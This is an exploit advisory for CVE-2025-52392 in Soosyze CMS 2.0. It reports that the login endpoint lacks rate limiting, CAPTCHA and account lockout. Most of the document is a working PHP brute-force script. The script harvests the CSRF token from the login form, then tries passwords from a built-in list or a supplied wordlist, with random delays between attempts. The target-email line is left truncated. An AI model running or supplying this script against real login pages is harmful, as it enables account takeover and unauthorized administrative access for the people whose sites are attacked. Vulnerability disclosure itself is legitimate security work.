=============================================================================================================================================
| # Title Soosyze CMS 2.0 Brute Forcer
=============================================================================================================================================
| # Title : Soosyze CMS 2.0 - Authentication Brute Force Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/soosyze/soosyze |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/208515/ & CVE-2025-52392
[+] Summary : Soosyze CMS version 2.0 is vulnerable to a brute-force authentication attack due to the absence of rate limiting, CAPTCHA enforcement, and account lockout mechanisms on the login endpoint `/user/login`.
An attacker can repeatedly submit authentication requests using a known email address and a password wordlist, allowing unlimited login attempts until valid credentials are discovered.
This vulnerability may lead to full account compromise and unauthorized administrative access.
[+] POC: php poc.php wordlist.txt
<?php
declare(strict_types=1);
error_reporting(E_ALL);
ini_set('display_errors', '1');
$baseUrl = 'http://localhost:8000';
$loginPath = '/user/login';
$formUrl = $baseUrl . $loginPath;
$emailField = 'email';
$passField = 'password';
$targetEmail = '
$defaultWords = [
'123456',
'admin',
'password',
'qwerty',
'letmein',
'admin123',
'password1'
];
$wordlistFile = $argv[1] ?? null;
$words = $defaultWords;
if ($wordlistFile && is_readable($wordlistFile)) {
$words = array_map('trim', file($wordlistFile));
}
$cookieFile = tempnam(sys_get_temp_dir(), 'soosyze_');
function curlRequest(string $url, array $options = []): string
{
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
] + $options);
$response = curl_exec($ch);
curl_close($ch);
return $response ?: '';
}
function getLoginForm(string $url, string $cookieFile): string
{
return curlRequest($url, [
CURLOPT_COOKIEJAR => $cookieFile,
CURLOPT_COOKIEFILE => $cookieFile,
]);
}
function extractCsrfToken(string $html): array
{
if (preg_match(
'/name="([_a-zA-Z0-9:-]*(csrf|token)[_a-zA-Z0-9:-]*)".*?value="([^"]*)"/i',
$html,
$m
)) {
return [$m[1], $m[3]];
}
return ['', ''];
}
function postLogin(
string $url,
string $email,
string $password,
string $cookieFile,
string $tokenName,
string $tokenValue
): string {
$postData = [
'email' => $email,
'password' => $password
];
if ($tokenName && $tokenValue) {
$postData[$tokenName] = $tokenValue;
}
return curlRequest($url, [
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($postData),
CURLOPT_COOKIEJAR => $cookieFile,
CURLOPT_COOKIEFILE => $cookieFile,
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Origin: ' . parse_url($url, PHP_URL_SCHEME) . '://' . parse_url($url, PHP_URL_HOST),
'Referer: ' . $url
]
]);
}
echo "[*] Starting authorized brute-force PoC on {$formUrl}\n";
$attempt = 0;
foreach ($words as $pw) {
$attempt++;
$html = getLoginForm($formUrl, $cookieFile);
[$tokenName, $tokenValue] = extractCsrfToken($html);
$response = postLogin(
$formUrl,
$targetEmail,
$pw,
$cookieFile,
$tokenName,
$tokenValue
);
if (strpos($response, 'redirect') !== false) {
echo "[+] Password FOUND: {$pw} (attempt {$attempt})\n";
break;
}
echo "[-] Attempt {$attempt}: {$pw}\n";
usleep(random_int(100000, 900000));
}
@unlink($cookieFile);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================